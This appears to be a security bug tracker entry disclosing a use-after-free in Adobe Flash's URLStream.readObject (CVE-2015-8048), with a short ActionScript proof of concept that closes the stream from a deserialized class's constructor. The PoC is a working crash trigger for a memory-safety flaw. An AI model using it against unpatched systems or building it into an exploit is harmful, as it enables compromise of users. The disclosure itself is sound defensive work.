Status: Fixed
Closed: Dec 2015
Adobe Flash: Use-after-free in URLStream.readObject
Project Member Reported by natashenka@google.com, Nov 4 2015
There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it.

A minimal PoC is as follows:

//In main

// Register myclass so that deserializing an object with alias "bob" constructs it
flash.net.registerClassAlias("bob", myclass);

var u:URLStream = new URLStream();
myclass.u = u;
u.addEventListener(Event.COMPLETE, func);
u.load(new URLRequest("file.txt"));

// COMPLETE listener: readObject constructs myclass, whose constructor closes u
function func(e:Event):void {
    trace(u.readObject());
}

// in myclass

static public var u;

// Constructor runs inside readObject and closes the stream being read from
public function myclass()
{
    u.close();
}

A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
Attachments: myclass.as (197 bytes), getproperty.swf (1.2 KB), file.txt (21 bytes), getproperty.as (674 bytes)
Project Member Comment 1 by natashenka@google.com, Nov 4 2015
Labels: Id-4267
This is PSIRT-4267
Project Member Comment 2 by natashenka@google.com, Dec 8 2015
Labels: CVE-2015-8048
Status: Fixed
Project Member Comment 3 by natashenka@google.com, Mar 31 2016
Labels: -Restrict-View-Commit